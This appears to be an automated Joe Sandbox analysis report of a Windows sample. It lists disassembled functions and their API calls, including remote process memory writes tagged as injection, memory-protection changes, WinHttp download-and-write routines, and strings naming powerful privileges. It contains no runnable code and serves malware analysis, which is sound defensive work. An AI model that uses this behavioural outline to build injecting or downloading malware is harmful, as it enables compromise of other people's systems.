GetFileAttributesW.KERNELBASE(?,?,?), ref: 00172F1B
CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00172F61

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F4D0, Relevance: 3.0, APIs: 2, Instructions: 43library

APIs

LoadLibraryW.KERNEL32(?), ref: 0017F4F8
GetProcAddress.KERNEL32(00173EF7,?), ref: 0017F52D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017BC10, Relevance: 3.0, APIs: 2, Instructions: 22

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F8B0, Relevance: 2.6, APIs: 2, Instructions: 92

APIs

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

memset.MSVCRT ref: 0017F8E0
memcpy.MSVCRT ref: 0017F8EB

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 0017D020: lstrlenW.KERNEL32(0017F91F,00000000,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002,-00000002), ref: 0017D03D
Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36), ref: 0017D061
Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D07C
Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D09C

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00173EB0, Relevance: 2.5, APIs: 2, Instructions: 27

APIs

??2@YAPAXI@Z.MSVCRT ref: 00173EB7
memset.MSVCRT ref: 00173ECD

Part of subcall function 0017F4D0: LoadLibraryW.KERNEL32(?), ref: 0017F4F8
Part of subcall function 0017F4D0: GetProcAddress.KERNEL32(00173EF7,?), ref: 0017F52D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00179070, Relevance: 1.6, APIs: 1, Instructions: 93

APIs

Part of subcall function 0017F0B0: ??2@YAPAXI@Z.MSVCRT ref: 0017F1C7
Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F206
Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F29B

Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C

??3@YAXPAX@Z.MSVCRT ref: 0017911F

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 0017F850: GetFileAttributesW.KERNELBASE(00000000,00000000,93840FC0,00000000,?,001790DF,00000000,00000000,00178BCD,00000000,00000000,00000000,00000000,001804FB,93840FC0), ref: 0017F873

Part of subcall function 00171C30: ??2@YAPAXI@Z.MSVCRT ref: 00171C52
Part of subcall function 00171C30: ??3@YAXPAX@Z.MSVCRT ref: 00171C9A

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00171820, Relevance: 1.6, APIs: 1, Instructions: 85library

APIs

GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00171140: VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00176E00, Relevance: 1.6, APIs: 1, Instructions: 85

APIs

GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00176E5D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00176670, Relevance: 1.6, APIs: 1, Instructions: 78library

APIs

GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA

Part of subcall function 00171140: VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017E7A0, Relevance: 1.6, APIs: 1, Instructions: 53com

APIs

CoCreateInstance.OLE32(00184254,00000000,00000001,00184264,00000000,00176AB4,?,00000000), ref: 0017E7DC

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00175050, Relevance: 1.6, APIs: 1, Instructions: 52

APIs

WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00188880,?), ref: 0017508D

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F850, Relevance: 1.5, APIs: 1, Instructions: 37

APIs

Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938

GetFileAttributesW.KERNELBASE(00000000,00000000,93840FC0,00000000,?,001790DF,00000000,00000000,00178BCD,00000000,00000000,00000000,00000000,001804FB,93840FC0), ref: 0017F873

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017EAC0, Relevance: 1.5, APIs: 1, Instructions: 33com

APIs

CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00177B30, Relevance: 1.5, APIs: 1, Instructions: 31injection

APIs

WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00176DA0, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE54,?,?,?,00000070,00000000), ref: 00176DC9

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017DC60, Relevance: 1.5, APIs: 1, Instructions: 20

APIs

VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00171140, Relevance: 1.5, APIs: 1, Instructions: 17

APIs

VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00176920, Relevance: 1.4, APIs: 1, Instructions: 134

APIs

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

memcpy.MSVCRT ref: 00176A18

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 001776E0: memcpy.MSVCRT ref: 001777B9

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00175A90, Relevance: 1.4, APIs: 1, Instructions: 112sleep

APIs

Part of subcall function 00176F50: _wtoi.MSVCRT ref: 00176F8C

Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00171F50, Relevance: 1.3, APIs: 1, Instructions: 85

APIs

memcpy.MSVCRT ref: 00171FEC

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182A70, Relevance: 1.3, APIs: 1, Instructions: 23sleep

APIs

Sleep.KERNELBASE(000003E8), ref: 00182AC4

Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017A97C
Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AA0E
Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AAEE

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00182A79, Relevance: 1.3, APIs: 1, Instructions: 19sleep

APIs

Sleep.KERNELBASE(000003E8), ref: 00182AC4

Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017A97C
Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AA0E
Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AAEE

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017BC60, Relevance: 1.3, APIs: 1, Instructions: 12

APIs

HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0041593C, Relevance: .0, Instructions: 27

Memory Dump Source

Source File: 00000015.00000001.10616087968.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_ounehcnaykuM.jbxd

Non-executed Functions

Function 0017FBD0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 204library

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0017FC4F
GetProcAddress.KERNEL32(00000000,?), ref: 0017FC72
GetProcAddress.KERNEL32(00000000,?), ref: 0017FC95
GetProcAddress.KERNEL32(00000000,?), ref: 0017FCB8

Strings

SeTcbPrivilege, xrefs: 0017FCFC

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00172C63, Relevance: 6.0, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0017DD4D
UnhandledExceptionFilter.KERNEL32(00186DB8), ref: 0017DD58
GetCurrentProcess.KERNEL32(C0000409), ref: 0017DD63
TerminateProcess.KERNEL32(00000000), ref: 0017DD6A

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 001821B0, Relevance: 2.8, APIs: 2, Instructions: 274

APIs

memset.MSVCRT ref: 001822E8
memset.MSVCRT ref: 001823F9

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00183130, Relevance: 1.3, Strings: 1, Instructions: 52

Strings

SeTakeOwnershipPrivilege, xrefs: 00183149

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017F590, Relevance: .1, Instructions: 80

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017BB60, Relevance: .1, Instructions: 72

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 00177270, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 250time

APIs

memset.MSVCRT ref: 00177292
WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,?,001804FF), ref: 001772B7

Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042

WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,001804FB,?,?,?,?,001804FF), ref: 0017734E
WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,0017D31E,?,001804FB,?,?,?,?,001804FF), ref: 0017737B
WinHttpConnect.WINHTTP(00000000,0017D31E,00000000,00000000,?,001804FB,?,?,?,?,001804FF), ref: 0017738A
WinHttpOpenRequest.WINHTTP(00000000,?,?,00000000,00000000,00000000,00800000,?,?,?,?,?,001804FB), ref: 001773EB
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,001804FB), ref: 00177408
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 00177419
WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?,001804FB,?,?,?,?), ref: 00177440
WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 0017746C
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,001804FB,?,?,?,?), ref: 001774AD

Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D

WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 001774D7
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 001774E1
WinHttpCloseHandle.WINHTTP(?,?,001804FB,?,?,?,?,001804FF), ref: 001774EB

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

Strings

<, xrefs: 001772A7
q*\n)W\n, xrefs: 001774D7, 001774E1, 001774EB

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017DB20, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117time

APIs

WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017DB4E
WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20,00000000,00000000), ref: 0017DB6F
WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 0017DBA6
WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 0017DBCC
WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 0017DBEF
WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 0017DBFE
WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 0017DC1B
WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017DC42

Strings

q*\n)W\n, xrefs: 0017DB4E, 0017DC42

Memory Dump Source

Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true

Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

Function 0017AB80, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 195

APIs

SysFreeString.OLEAUT32(?), ref: 0017AD77

Part of subcall function 00182DB0: tolower.MSVCRT ref: 00182DEB

SysFreeString.OLEAUT32(?), ref: 0017AC38
SysFreeString.OLEAUT32(?), ref: 0017AC49
SysAllocString.OLEAUT32(?), ref: 0017ACD4

Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73

_wtoi.MSVCRT ref: 0017ACA4

Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E008
